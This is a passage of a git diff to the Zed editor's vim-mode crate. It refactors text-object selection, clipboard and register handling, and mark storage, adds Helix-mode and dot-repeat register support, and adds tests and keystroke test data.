= relative_to.to_offset(map, Bias::Left); - // The `argument` vim text object uses the syntax tree, so we operate at the buffer level and map back to the display level - let mut excerpt = snapshot.excerpt_containing(offset..offset)?; - let buffer = excerpt.buffer(); - fn comma_delimited_range_at( buffer: &BufferSnapshot, mut offset: BufferOffset, include_comma: bool, ) -> Option> { - // Seek to the first non-whitespace character offset += buffer .chars_at(offset) .take_while(|c| c.is_whitespace()) @@ -1228,25 +1241,20 @@ fn argument( .sum::(); let bracket_filter = |open: Range, close: Range| { - // Filter out empty ranges if open.end == close.start { return false; } - // If the cursor is outside the brackets, ignore 
them if open.start == offset.0 || close.end == offset.0 { return false; } - // TODO: Is there any better way to filter out string brackets? - // Used to filter out string brackets matches!( buffer.chars_at(open.start).next(), Some('(' | '[' | '{' | '<' | '|') ) }; - // Find the brackets containing the cursor let (open_bracket, close_bracket) = buffer.innermost_enclosing_bracket_ranges(offset..offset, Some(&bracket_filter))?; @@ -1256,7 +1264,6 @@ fn argument( let node = layer.node(); let mut cursor = node.walk(); - // Loop until we find the smallest node whose parent covers the bracket range. This node is the argument in the parent argument list let mut parent_covers_bracket_range = false; loop { let node = cursor.node(); @@ -1268,20 +1275,17 @@ fn argument( } parent_covers_bracket_range = covers_bracket_range; - // Unable to find a child node with a parent that covers the bracket range, so no argument to select cursor.goto_first_child_for_byte(offset.0)?; } let mut argument_node = cursor.node(); - // If the child node is the open bracket, move to the next sibling. if argument_node.byte_range() == open_bracket { if !cursor.goto_next_sibling() { return Some(inner_bracket_range); } argument_node = cursor.node(); } - // While the child node is the close bracket or a comma, move to the previous sibling while argument_node.byte_range() == close_bracket || argument_node.kind() == "," { if !cursor.goto_previous_sibling() { return Some(inner_bracket_range); @@ -1292,14 +1296,11 @@ fn argument( } } - // The start and end of the argument range, defaulting to the start and end of the argument node let mut start = argument_node.start_byte(); let mut end = argument_node.end_byte(); let mut needs_surrounding_comma = include_comma; - // Seek backwards to find the start of the argument - either the previous comma or the opening bracket. 
- // We do this because multiple nodes can represent a single argument, such as with rust `vec![a.b.c, d.e.f]` while cursor.goto_previous_sibling() { let prev = cursor.node(); @@ -1317,7 +1318,6 @@ fn argument( } } - // Do the same for the end of the argument, extending to next comma or the end of the argument list while cursor.goto_next_sibling() { let next = cursor.node(); @@ -1326,7 +1326,6 @@ fn argument( break; } else if next.kind() == "," { if needs_surrounding_comma { - // Select up to the beginning of the next argument if there is one, otherwise to the end of the comma if let Some(next_arg) = next.next_sibling() { end = next_arg.start_byte(); } else { @@ -1342,14 +1341,17 @@ fn argument( Some(BufferOffset(start)..BufferOffset(end)) } - let result = comma_delimited_range_at(buffer, excerpt.map_offset_to_buffer(offset), around)?; + let results = + snapshot.map_excerpt_ranges(offset..offset, |buffer, _excerpt_range, buffer_range| { + let buffer_offset = buffer_range.start; + match comma_delimited_range_at(buffer, buffer_offset, around) { + Some(result) => vec![(result, ())], + None => vec![], + } + })?; - if excerpt.contains_buffer_range(result.clone()) { - let result = excerpt.map_range_from_buffer(result); - Some(result.start.to_display_point(map)..result.end.to_display_point(map)) - } else { - None - } + let (range, ()) = results.into_iter().next()?; + Some(range.start.to_display_point(map)..range.end.to_display_point(map)) } fn indent( @@ -3369,7 +3371,12 @@ mod test { // but, since this is being set manually, the language isn't // automatically set. 
let editor = Editor::new(EditorMode::full(), multi_buffer.clone(), None, window, cx); - let buffer_ids = multi_buffer.read(cx).excerpt_buffer_ids(); + let buffer_ids = multi_buffer + .read(cx) + .snapshot(cx) + .excerpts() + .map(|excerpt| excerpt.context.start.buffer_id) + .collect::>(); if let Some(buffer) = multi_buffer.read(cx).buffer(buffer_ids[1]) { buffer.update(cx, |buffer, cx| { buffer.set_language(Some(language::rust_lang()), cx); diff --git a/crates/vim/src/replace.rs b/crates/vim/src/replace.rs index 49cc4a27ff59eebde2f9ce50e99e08a27e830853..338cf9bfe985654172d690518240879c84e9e2ae 100644 --- a/crates/vim/src/replace.rs +++ b/crates/vim/src/replace.rs @@ -282,12 +282,12 @@ impl Vim { /// Pastes the clipboard contents, replacing the same number of characters /// as the clipboard's contents. pub fn paste_replace(&mut self, window: &mut Window, cx: &mut Context) { - let clipboard_text = - cx.read_from_clipboard() - .and_then(|item| match item.entries().first() { - Some(ClipboardEntry::String(text)) => Some(text.text().to_string()), - _ => None, - }); + let clipboard_text = cx.read_from_clipboard().and_then(|item| { + item.entries().iter().find_map(|entry| match entry { + ClipboardEntry::String(text) => Some(text.text().to_string()), + _ => None, + }) + }); if let Some(text) = clipboard_text { self.push_operator(Operator::Replace, window, cx); diff --git a/crates/vim/src/rewrap.rs b/crates/vim/src/rewrap.rs index 3cb7d66116023d979d83e04a00b974fdd2a6d078..208bbfc7e6b37bb5b3ec2a8f53aaa191d79444bd 100644 --- a/crates/vim/src/rewrap.rs +++ b/crates/vim/src/rewrap.rs @@ -1,19 +1,20 @@ use crate::{Vim, motion::Motion, object::Object, state::Mode}; use collections::HashMap; use editor::{Bias, Editor, RewrapOptions, SelectionEffects, display_map::ToDisplayPoint}; -use gpui::{Context, Window, actions}; +use gpui::{Action, Context, Window}; use language::SelectionGoal; +use schemars::JsonSchema; +use serde::Deserialize; -actions!( - vim, - [ - /// Rewraps the 
selected text to fit within the line width. - Rewrap - ] -); +/// Rewraps the selected text to fit within the line width. +#[derive(Clone, Deserialize, JsonSchema, PartialEq, Action)] +#[action(namespace = vim)] +pub(crate) struct Rewrap { + pub line_length: Option, +} pub(crate) fn register(editor: &mut Editor, cx: &mut Context) { - Vim::action(editor, cx, |vim, _: &Rewrap, window, cx| { + Vim::action(editor, cx, |vim, action: &Rewrap, window, cx| { vim.record_current_action(cx); Vim::take_count(cx); Vim::take_forced_motion(cx); @@ -24,6 +25,7 @@ pub(crate) fn register(editor: &mut Editor, cx: &mut Context) { editor.rewrap_impl( RewrapOptions { override_language_settings: true, + line_length: action.line_length, ..Default::default() }, cx, diff --git a/crates/vim/src/state.rs b/crates/vim/src/state.rs index 0244a14c83b422a1fed803c761c7e873b42bd267..4dd557199ab9aebe0a2b26438bdaa0e321a956b2 100644 --- a/crates/vim/src/state.rs +++ b/crates/vim/src/state.rs @@ -18,6 +18,7 @@ use gpui::{ EntityId, Global, HighlightStyle, StyledText, Subscription, Task, TextStyle, WeakEntity, }; use language::{Buffer, BufferEvent, BufferId, Chunk, Point}; + use multi_buffer::MultiBufferRow; use picker::{Picker, PickerDelegate}; use project::{Project, ProjectItem, ProjectPath}; @@ -28,7 +29,7 @@ use std::collections::HashSet; use std::path::Path; use std::{fmt::Display, ops::Range, sync::Arc}; use text::{Bias, ToPoint}; -use theme::ThemeSettings; +use theme_settings::ThemeSettings; use ui::{ ActiveTheme, Context, Div, FluentBuilder, KeyBinding, ParentElement, SharedString, Styled, StyledTypography, Window, h_flex, rems, @@ -73,6 +74,10 @@ impl Mode { Self::Normal | Self::Insert | Self::Replace | Self::HelixNormal => false, } } + + pub fn is_helix(&self) -> bool { + matches!(self, Self::HelixNormal | Self::HelixSelect) + } } #[derive(Clone, Debug, PartialEq)] @@ -187,14 +192,15 @@ impl From for ClipboardItem { impl From for Register { fn from(item: ClipboardItem) -> Self { - // For now, 
we don't store metadata for multiple entries. - match item.entries().first() { - Some(ClipboardEntry::String(value)) if item.entries().len() == 1 => Register { + match item.entries().iter().find_map(|entry| match entry { + ClipboardEntry::String(value) => Some(value), + _ => None, + }) { + Some(value) => Register { text: value.text().to_owned().into(), clipboard_selections: value.metadata_json::>(), }, - // For now, registers can't store images. This could change in the future. - _ => Register::default(), + None => Register::default(), } } } @@ -228,7 +234,15 @@ pub struct VimGlobals { pub recorded_actions: Vec, pub recorded_selection: RecordedSelection, + /// The register being written to by the active `q{register}` macro + /// recording. pub recording_register: Option, + /// The register that was selected at the start of the current + /// dot-recording, for example, `"ap`. + pub recording_register_for_dot: Option, + /// The register from the last completed dot-recording. Used when replaying + /// with `.`. + pub recorded_register_for_dot: Option, pub last_recorded_register: Option, pub last_replayed_register: Option, pub replayer: Option, @@ -310,10 +324,11 @@ impl MarksState { let Some(workspace_id) = this.update(cx, |this, cx| this.workspace_id(cx)).ok()? 
else { return None; }; + let db = cx.update(|cx| VimDb::global(cx)); let (marks, paths) = cx .background_spawn(async move { - let marks = DB.get_marks(workspace_id)?; - let paths = DB.get_global_marks_paths(workspace_id)?; + let marks = db.get_marks(workspace_id)?; + let paths = db.get_global_marks_paths(workspace_id)?; anyhow::Ok((marks, paths)) }) .await @@ -411,7 +426,7 @@ impl MarksState { name.clone(), buffer .read(cx) - .summaries_for_anchors::(anchors) + .summaries_for_anchors::(anchors.iter().copied()) .collect(), ) }) @@ -432,8 +447,9 @@ impl MarksState { if let Some(workspace_id) = self.workspace_id(cx) { let path = path.clone(); let key = key.clone(); + let db = VimDb::global(cx); cx.background_spawn(async move { - DB.set_global_mark_path(workspace_id, key, path).await + db.set_global_mark_path(workspace_id, key, path).await }) .detach_and_log_err(cx); } @@ -449,8 +465,9 @@ impl MarksState { self.serialized_marks.insert(path.clone(), new_points); if let Some(workspace_id) = self.workspace_id(cx) { + let db = VimDb::global(cx); cx.background_spawn(async move { - DB.set_marks(workspace_id, path.clone(), to_write).await?; + db.set_marks(workspace_id, path.clone(), to_write).await?; anyhow::Ok(()) }) .detach_and_log_err(cx); @@ -475,7 +492,14 @@ impl MarksState { { let buffer_marks = old_marks .into_iter() - .map(|(k, v)| (k, v.into_iter().map(|anchor| anchor.text_anchor).collect())) + .map(|(k, v)| { + ( + k, + v.into_iter() + .filter_map(|anchor| anchor.raw_text_anchor()) + .collect(), + ) + }) .collect(); self.buffer_marks .insert(buffer.read(cx).remote_id(), buffer_marks); @@ -515,7 +539,7 @@ impl MarksState { cx: &mut Context, ) { let on_change = cx.subscribe(buffer_handle, move |this, buffer, event, cx| match event { - BufferEvent::Edited => { + BufferEvent::Edited { .. 
} => { if let Some(path) = this.path_for_buffer(&buffer, cx) { this.serialize_buffer_marks(path, &buffer, cx); } @@ -552,6 +576,7 @@ impl MarksState { anchors: Vec, cx: &mut Context, ) { + let multibuffer_snapshot = multibuffer.read(cx).snapshot(cx); let buffer = multibuffer.read(cx).as_singleton(); let abs_path = buffer.as_ref().and_then(|b| self.path_for_buffer(b, cx)); @@ -585,7 +610,7 @@ impl MarksState { name.clone(), anchors .into_iter() - .map(|anchor| anchor.text_anchor) + .filter_map(|anchor| Some(multibuffer_snapshot.anchor_to_buffer_anchor(anchor)?.0)) .collect(), ); if !self.watched_buffers.contains_key(&buffer_id) { @@ -612,12 +637,13 @@ impl MarksState { return Some(Mark::Local(anchors.get(name)?.clone())); } - let (excerpt_id, buffer_id, _) = multi_buffer.read(cx).read(cx).as_singleton()?; - if let Some(anchors) = self.buffer_marks.get(&buffer_id) { + let multibuffer_snapshot = multi_buffer.read(cx).snapshot(cx); + let buffer_snapshot = multibuffer_snapshot.as_singleton()?; + if let Some(anchors) = self.buffer_marks.get(&buffer_snapshot.remote_id()) { let text_anchors = anchors.get(name)?; let anchors = text_anchors .iter() - .map(|anchor| Anchor::in_buffer(excerpt_id, *anchor)) + .filter_map(|anchor| multibuffer_snapshot.anchor_in_excerpt(*anchor)) .collect(); return Some(Mark::Local(anchors)); } @@ -643,8 +669,9 @@ impl MarksState { let path = if let Some(target) = self.global_marks.get(&mark_name.clone()) { let name = mark_name.clone(); if let Some(workspace_id) = self.workspace_id(cx) { + let db = VimDb::global(cx); cx.background_spawn(async move { - DB.delete_global_marks_path(workspace_id, name).await + db.delete_global_marks_path(workspace_id, name).await }) .detach_and_log_err(cx); } @@ -684,7 +711,8 @@ impl MarksState { .get_mut(&path) .map(|m| m.remove(&mark_name.clone())); if let Some(workspace_id) = self.workspace_id(cx) { - cx.background_spawn(async move { DB.delete_mark(workspace_id, path, mark_name).await }) + let db = 
VimDb::global(cx); + cx.background_spawn(async move { db.delete_mark(workspace_id, path, mark_name).await }) .detach_and_log_err(cx); } } @@ -876,14 +904,13 @@ impl VimGlobals { } } '%' => editor.and_then(|editor| { - let selection = editor - .selections - .newest::(&editor.display_snapshot(cx)); - if let Some((_, buffer, _)) = editor - .buffer() - .read(cx) - .excerpt_containing(selection.head(), cx) - { + let multibuffer = editor.buffer().read(cx); + let snapshot = multibuffer.snapshot(cx); + let selection = editor.selections.newest_anchor(); + let buffer = snapshot + .anchor_to_buffer_anchor(selection.head()) + .and_then(|(text_anchor, _)| multibuffer.buffer(text_anchor.buffer_id)); + if let Some(buffer) = buffer { buffer .read(cx) .file() @@ -915,6 +942,7 @@ impl VimGlobals { self.dot_recording = false; self.recorded_actions = std::mem::take(&mut self.recording_actions); self.recorded_count = self.recording_count.take(); + self.recorded_register_for_dot = self.recording_register_for_dot.take(); self.stop_recording_after_next_action = false; } } @@ -942,6 +970,7 @@ impl VimGlobals { self.dot_recording = false; self.recorded_actions = std::mem::take(&mut self.recording_actions); self.recorded_count = self.recording_count.take(); + self.recorded_register_for_dot = self.recording_register_for_dot.take(); self.stop_recording_after_next_action = false; } } @@ -1001,6 +1030,7 @@ impl Clone for ReplayableAction { pub struct SearchState { pub direction: Direction, pub count: usize, + pub cmd_f_search: bool, pub prior_selections: Vec>, pub prior_operator: Option, @@ -1382,8 +1412,8 @@ impl MarksMatchInfo { let mut offset = 0; for chunk in chunks { line.push_str(chunk.text); - if let Some(highlight_style) = chunk.syntax_highlight_id - && let Some(highlight) = highlight_style.style(cx.theme().syntax()) + if let Some(highlight_id) = chunk.syntax_highlight_id + && let Some(highlight) = cx.theme().syntax().get(highlight_id).cloned() { highlights.push((offset..offset + 
chunk.text.len(), highlight)) } @@ -1750,7 +1780,7 @@ impl Domain for VimDb { ]; } -db::static_connection!(DB, VimDb, [WorkspaceDb]); +db::static_connection!(VimDb, [WorkspaceDb]); struct SerializedMark { path: Arc, diff --git a/crates/vim/src/test.rs b/crates/vim/src/test.rs index 2d0ec4f69a0aaa93b191933565b9db27d8fb3198..961729e0e24a66a624e30ca7c72bfe5f13e10bca 100644 --- a/crates/vim/src/test.rs +++ b/crates/vim/src/test.rs @@ -2117,7 +2117,12 @@ async fn test_folded_multibuffer_excerpts(cx: &mut gpui::TestAppContext) { ); let mut editor = Editor::new(EditorMode::full(), multi_buffer.clone(), None, window, cx); - let buffer_ids = multi_buffer.read(cx).excerpt_buffer_ids(); + let buffer_ids = multi_buffer + .read(cx) + .snapshot(cx) + .excerpts() + .map(|excerpt| excerpt.context.start.buffer_id) + .collect::>(); // fold all but the second buffer, so that we test navigating between two // adjacent folded buffers, as well as folded buffers at the start and // end the multibuffer @@ -2262,7 +2267,13 @@ async fn test_folded_multibuffer_excerpts(cx: &mut gpui::TestAppContext) { " }); cx.update_editor(|editor, _, cx| { - let buffer_ids = editor.buffer().read(cx).excerpt_buffer_ids(); + let buffer_ids = editor + .buffer() + .read(cx) + .snapshot(cx) + .excerpts() + .map(|excerpt| excerpt.context.start.buffer_id) + .collect::>(); editor.fold_buffer(buffer_ids[1], cx); }); diff --git a/crates/vim/src/test/vim_test_context.rs b/crates/vim/src/test/vim_test_context.rs index 2d5ed4227dcc263f56cfa0bcb337f5673df8ef3c..6f15450aa3f70593c6877c293fecb765978e065d 100644 --- a/crates/vim/src/test/vim_test_context.rs +++ b/crates/vim/src/test/vim_test_context.rs @@ -27,9 +27,10 @@ impl VimTestContext { git_ui::init(cx); crate::init(cx); search::init(cx); - theme::init(theme::LoadThemes::JustBase, cx); + theme_settings::init(theme::LoadThemes::JustBase, cx); settings_ui::init(cx); markdown_preview::init(cx); + zed_actions::init(); }); } @@ -108,12 +109,12 @@ impl VimTestContext { } 
cx.bind_keys(default_key_bindings); if enabled { - let vim_key_bindings = settings::KeymapFile::load_asset( - "keymaps/vim.json", - Some(settings::KeybindSource::Vim), - cx, - ) - .unwrap(); + let mut vim_key_bindings = + settings::KeymapFile::load_asset_allow_partial_failure("keymaps/vim.json", cx) + .unwrap(); + for key_binding in &mut vim_key_bindings { + key_binding.set_meta(settings::KeybindSource::Vim.meta()); + } cx.bind_keys(vim_key_bindings); } } diff --git a/crates/vim/src/vim.rs b/crates/vim/src/vim.rs index edbbca1c30fb1bda0bedc35d0de6666228b9ef5d..a66111cae1576744c4c51d717984d67c12fc8235 100644 --- a/crates/vim/src/vim.rs +++ b/crates/vim/src/vim.rs @@ -51,7 +51,7 @@ pub use settings::{ use state::{Mode, Operator, RecordedSelection, SearchState, VimGlobals}; use std::{mem, ops::Range, sync::Arc}; use surrounds::SurroundsType; -use theme::ThemeSettings; +use theme_settings::ThemeSettings; use ui::{IntoElement, SharedString, px}; use vim_mode_setting::HelixModeSetting; use vim_mode_setting::VimModeSetting; @@ -432,8 +432,12 @@ pub fn init(cx: &mut App) { .and_then(|item| item.act_as::(cx)) .and_then(|editor| editor.read(cx).addon::().cloned()); let Some(vim) = vim else { return }; - vim.entity.update(cx, |_, cx| { - cx.defer_in(window, |vim, window, cx| vim.search_submit(window, cx)) + vim.entity.update(cx, |vim, cx| { + if !vim.search.cmd_f_search { + cx.defer_in(window, |vim, window, cx| vim.search_submit(window, cx)) + } else { + cx.propagate() + } }) }); workspace.register_action(|_, _: &GoToTab, window, cx| { @@ -449,7 +453,10 @@ pub fn init(cx: &mut App) { ); } else { // If no count is provided, go to the next tab. - window.dispatch_action(workspace::pane::ActivateNextItem.boxed_clone(), cx); + window.dispatch_action( + workspace::pane::ActivateNextItem::default().boxed_clone(), + cx, + ); } }); @@ -473,7 +480,10 @@ pub fn init(cx: &mut App) { } } else { // No count provided, go to the previous tab. 
- window.dispatch_action(workspace::pane::ActivatePreviousItem.boxed_clone(), cx); + window.dispatch_action( + workspace::pane::ActivatePreviousItem::default().boxed_clone(), + cx, + ); } }); }) @@ -601,9 +611,11 @@ impl Vim { } let mut was_enabled = Vim::enabled(cx); + let mut was_helix_enabled = HelixModeSetting::get_global(cx).0; let mut was_toggle = VimSettings::get_global(cx).toggle_relative_line_numbers; cx.observe_global_in::(window, move |editor, window, cx| { let enabled = Vim::enabled(cx); + let helix_enabled = HelixModeSetting::get_global(cx).0; let toggle = VimSettings::get_global(cx).toggle_relative_line_numbers; if enabled && was_enabled && (toggle != was_toggle) { if toggle { @@ -615,15 +627,20 @@ impl Vim { editor.set_relative_line_number(None, cx) } } - was_toggle = VimSettings::get_global(cx).toggle_relative_line_numbers; - if was_enabled == enabled { + let helix_changed = was_helix_enabled != helix_enabled; + was_toggle = toggle; + was_helix_enabled = helix_enabled; + + let state_changed = (was_enabled != enabled) || (was_enabled && helix_changed); + if !state_changed { return; } + if was_enabled { + Self::deactivate(editor, cx); + } was_enabled = enabled; if enabled { - Self::activate(editor, window, cx) - } else { - Self::deactivate(editor, cx) + Self::activate(editor, window, cx); } }) .detach(); @@ -635,7 +652,7 @@ impl Vim { fn activate(editor: &mut Editor, window: &mut Window, cx: &mut Context) { let vim = Vim::new(window, cx); let state = vim.update(cx, |vim, cx| { - if !editor.mode().is_full() { + if !editor.use_modal_editing() { vim.mode = Mode::Insert; } @@ -978,6 +995,7 @@ impl Vim { editor.set_clip_at_line_ends(false, cx); editor.set_collapse_matches(false); editor.set_input_enabled(true); + editor.set_expects_character_input(true); editor.set_autoindent(true); editor.selections.set_line_mode(false); editor.unregister_addon::(); @@ -995,7 +1013,14 @@ impl Vim { cx: &mut Context, f: impl Fn(&mut Vim, &A, &mut Window, &mut Context) + 
'static, ) { - let subscription = editor.register_action(cx.listener(f)); + let subscription = editor.register_action(cx.listener(move |vim, action, window, cx| { + if !Vim::globals(cx).dot_replaying { + if vim.status_label.take().is_some() { + cx.notify(); + } + } + f(vim, action, window, cx); + })); cx.on_release(|_, _| drop(subscription)).detach(); } @@ -1154,7 +1179,6 @@ impl Vim { let last_mode = self.mode; let prior_mode = self.last_mode; let prior_tx = self.current_tx; - self.status_label.take(); self.last_mode = last_mode; self.mode = mode; self.operator_stack.clear(); @@ -1196,7 +1220,7 @@ impl Vim { return; } - if !mode.is_visual() && last_mode.is_visual() { + if !mode.is_visual() && last_mode.is_visual() && !last_mode.is_helix() { self.create_visual_marks(last_mode, window, cx); } @@ -1263,7 +1287,7 @@ impl Vim { } s.move_with(&mut |map, selection| { - if last_mode.is_visual() && !mode.is_visual() { + if last_mode.is_visual() && !last_mode.is_helix() && !mode.is_visual() { let mut point = selection.head(); if !selection.reversed && !selection.is_empty() { point = movement::left(map, selection.head()); @@ -1346,6 +1370,15 @@ impl Vim { } } + fn expects_character_input(&self) -> bool { + if let Some(operator) = self.operator_stack.last() { + if operator.is_waiting(self.mode) { + return true; + } + } + self.editor_input_enabled() + } + pub fn editor_input_enabled(&self) -> bool { match self.mode { Mode::Insert => { @@ -1576,6 +1609,7 @@ impl Vim { globals.dot_recording = true; globals.recording_actions = Default::default(); globals.recording_count = None; + globals.recording_register_for_dot = self.selected_register; let selections = self.editor().map(|editor| { editor.update(cx, |editor, cx| { @@ -2056,10 +2090,11 @@ impl Vim { VimEditorSettingsState { cursor_shape: self.cursor_shape(cx), clip_at_line_ends: self.clip_at_line_ends(), - collapse_matches: !HelixModeSetting::get_global(cx).0, + collapse_matches: !HelixModeSetting::get_global(cx).0 && 
!self.search.cmd_f_search, input_enabled: self.editor_input_enabled(), + expects_character_input: self.expects_character_input(), autoindent: self.should_autoindent(), - cursor_offset_on_selection: self.mode.is_visual(), + cursor_offset_on_selection: self.mode.is_visual() || self.mode.is_helix(), line_mode: matches!(self.mode, Mode::VisualLine), hide_edit_predictions: !matches!(self.mode, Mode::Insert | Mode::Replace), } @@ -2075,11 +2110,17 @@ impl Vim { editor.set_clip_at_line_ends(state.clip_at_line_ends, cx); editor.set_collapse_matches(state.collapse_matches); editor.set_input_enabled(state.input_enabled); + editor.set_expects_character_input(state.expects_character_input); editor.set_autoindent(state.autoindent); editor.set_cursor_offset_on_selection(state.cursor_offset_on_selection); editor.selections.set_line_mode(state.line_mode); editor.set_edit_predictions_hidden_for_vim_mode(state.hide_edit_predictions, window, cx); } + + fn set_status_label(&mut self, label: impl Into, cx: &mut Context) { + self.status_label = Some(label.into()); + cx.notify(); + } } struct VimEditorSettingsState { @@ -2087,6 +2128,7 @@ struct VimEditorSettingsState { clip_at_line_ends: bool, collapse_matches: bool, input_enabled: bool, + expects_character_input: bool, autoindent: bool, cursor_offset_on_selection: bool, line_mode: bool, @@ -2099,6 +2141,7 @@ struct VimSettings { pub toggle_relative_line_numbers: bool, pub use_system_clipboard: settings::UseSystemClipboard, pub use_smartcase_find: bool, + pub use_regex_search: bool, pub gdefault: bool, pub custom_digraphs: HashMap>, pub highlight_on_yank_duration: u64, @@ -2185,6 +2228,7 @@ impl Settings for VimSettings { toggle_relative_line_numbers: vim.toggle_relative_line_numbers.unwrap(), use_system_clipboard: vim.use_system_clipboard.unwrap(), use_smartcase_find: vim.use_smartcase_find.unwrap(), + use_regex_search: vim.use_regex_search.unwrap(), gdefault: vim.gdefault.unwrap(), custom_digraphs: vim.custom_digraphs.unwrap(), 
highlight_on_yank_duration: vim.highlight_on_yank_duration.unwrap(), diff --git a/crates/vim/src/visual.rs b/crates/vim/src/visual.rs index 889e3468f2ef6eaa290b6e0aec1971cd2e9ad813..bc53167b158d26717b1aa629b764a78dfe4c0ddc 100644 --- a/crates/vim/src/visual.rs +++ b/crates/vim/src/visual.rs @@ -788,7 +788,10 @@ impl Vim { { let range = row_range.start.to_offset(&display_map, Bias::Right) ..row_range.end.to_offset(&display_map, Bias::Right); - let text = text.repeat(range.end - range.start); + let grapheme_count = display_map + .buffer_snapshot() + .grapheme_count_for_range(&range); + let text = text.repeat(grapheme_count); edits.push((range, text)); } } @@ -1561,6 +1564,38 @@ mod test { }); } + #[gpui::test] + async fn test_visual_block_insert_after_ctrl_d_scroll(cx: &mut gpui::TestAppContext) { + let mut cx = NeovimBackedTestContext::new(cx).await; + let shared_state_lines = (1..=10) + .map(|line_number| format!("{line_number:02}")) + .collect::>() + .join("\n"); + let shared_state = format!("ˇ{shared_state_lines}\n"); + + cx.set_scroll_height(5).await; + cx.set_shared_state(&shared_state).await; + + cx.simulate_shared_keystrokes("ctrl-v ctrl-d").await; + cx.shared_state().await.assert_matches(); + + cx.simulate_shared_keystrokes("shift-i x escape").await; + cx.shared_state().await.assert_eq(indoc! 
{ + " + ˇx01 + x02 + x03 + x04 + x05 + 06 + 07 + 08 + 09 + 10 + " + }); + } + #[gpui::test] async fn test_visual_block_wrapping_selection(cx: &mut gpui::TestAppContext) { let mut cx = NeovimBackedTestContext::new(cx).await; @@ -1985,4 +2020,21 @@ mod test { // would depend on the key bindings configured, but the actions // are now available for use } + + #[gpui::test] + async fn test_visual_replace_uses_graphemes(cx: &mut gpui::TestAppContext) { + let mut cx = VimTestContext::new(cx, true).await; + + cx.set_state("«Hällöˇ» Wörld", Mode::Visual); + cx.simulate_keystrokes("r 1"); + cx.assert_state("ˇ11111 Wörld", Mode::Normal); + + cx.set_state("«e\u{301}ˇ»", Mode::Visual); + cx.simulate_keystrokes("r 1"); + cx.assert_state("ˇ1", Mode::Normal); + + cx.set_state("«🙂ˇ»", Mode::Visual); + cx.simulate_keystrokes("r 1"); + cx.assert_state("ˇ1", Mode::Normal); + } } diff --git a/crates/vim/test_data/test_dot_repeat_registers.json b/crates/vim/test_data/test_dot_repeat_registers.json new file mode 100644 index 0000000000000000000000000000000000000000..76ca1af20fe14cacb23482cd6988dea16cfb9194 --- /dev/null +++ b/crates/vim/test_data/test_dot_repeat_registers.json @@ -0,0 +1,125 @@ +{"Put":{"state":"ˇhello\n"}} +{"Key":"y"} +{"Key":"y"} +{"Key":"p"} +{"Get":{"state":"hello\nˇhello\n","mode":"Normal"}} +{"Key":"."} +{"Get":{"state":"hello\nhello\nˇhello\n","mode":"Normal"}} +{"Put":{"state":"ˇtocopytext\n1\n2\n3\n"}} +{"Key":"y"} +{"Key":"y"} +{"Key":"j"} +{"Key":"\""} +{"Key":"_"} +{"Key":"d"} +{"Key":"d"} +{"Key":"."} +{"Key":"p"} +{"Get":{"state":"tocopytext\n3\nˇtocopytext\n","mode":"Normal"}} +{"Put":{"state":"ˇtocopytext\n1\n2\n3\n"}} +{"Key":"y"} +{"Key":"y"} +{"Key":"j"} +{"Key":"\""} +{"Key":"1"} +{"Key":"y"} +{"Key":"y"} +{"Key":"j"} +{"Key":"j"} +{"Key":"\""} +{"Key":"1"} +{"Key":"p"} +{"Key":"."} +{"Get":{"state":"tocopytext\n1\n2\n3\nˇ1\n","mode":"Normal"}} +{"Put":{"state":"ˇone\ntwo\nthree\n"}} +{"Key":"\""} +{"Key":"a"} +{"Key":"d"} +{"Key":"d"} +{"Key":"\""} 
+{"Key":"b"} +{"Key":"."} +{"Get":{"state":"ˇthree\n","mode":"Normal"}} +{"Key":"\""} +{"Key":"a"} +{"Key":"p"} +{"Key":"\""} +{"Key":"b"} +{"Key":"p"} +{"Get":{"state":"three\nˇtwo\n","mode":"Normal"}} +{"Put":{"state":"ˇline one\nline two\n"}} +{"Key":"\""} +{"Key":"a"} +{"Key":"y"} +{"Key":"y"} +{"Key":"j"} +{"Key":"\""} +{"Key":"a"} +{"Key":"p"} +{"Key":"."} +{"Key":"\""} +{"Key":"b"} +{"Key":"."} +{"Get":{"state":"line one\nline two\nline one\nline one\nˇline one\n","mode":"Normal"}} +{"Put":{"state":"ˇ1\n2\n3\n4\n5\n6\n7\n8\n9\n"}} +{"Key":"d"} +{"Key":"d"} +{"Key":"."} +{"Key":"."} +{"Key":"."} +{"Key":"."} +{"Key":"."} +{"Key":"."} +{"Key":"."} +{"Key":"."} +{"Get":{"state":"ˇ","mode":"Normal"}} +{"Key":"\""} +{"Key":"1"} +{"Key":"p"} +{"Key":"."} +{"Key":"."} +{"Key":"."} +{"Key":"."} +{"Key":"."} +{"Key":"."} +{"Key":"."} +{"Key":"."} +{"Key":"."} +{"Get":{"state":"\n9\n8\n7\n6\n5\n4\n3\n2\n1\nˇ1","mode":"Normal"}} +{"Put":{"state":"ˇa\nb\nc\n"}} +{"Key":"\""} +{"Key":"9"} +{"Key":"y"} +{"Key":"y"} +{"Key":"\""} +{"Key":"9"} +{"Key":"p"} +{"Key":"."} +{"Key":"."} +{"Get":{"state":"a\na\na\nˇa\nb\nc\n","mode":"Normal"}} +{"Put":{"state":"ˇone\ntwo\nthree\n"}} +{"Key":"d"} +{"Key":"d"} +{"Key":"p"} +{"Key":"."} +{"Get":{"state":"two\none\nˇone\nthree\n","mode":"Normal"}} +{"Put":{"state":"ˇone\ntwo\nthree\n"}} +{"Key":"\""} +{"Key":"a"} +{"Key":"y"} +{"Key":"y"} +{"Key":"j"} +{"Key":"\""} +{"Key":"1"} +{"Key":"y"} +{"Key":"y"} +{"Key":"k"} +{"Key":"\""} +{"Key":"1"} +{"Key":"p"} +{"Key":"."} +{"Key":"\""} +{"Key":"a"} +{"Key":"p"} +{"Key":"."} +{"Get":{"state":"one\ntwo\n9\none\nˇone\ntwo\nthree\n","mode":"Normal"}} diff --git a/crates/vim/test_data/test_dot_repeat_registers_paste.json b/crates/vim/test_data/test_dot_repeat_registers_paste.json new file mode 100644 index 0000000000000000000000000000000000000000..f5a08d432d0b1fda8ec1bfe71d7401ec8769d8d2 --- /dev/null +++ b/crates/vim/test_data/test_dot_repeat_registers_paste.json @@ -0,0 +1,105 @@ 
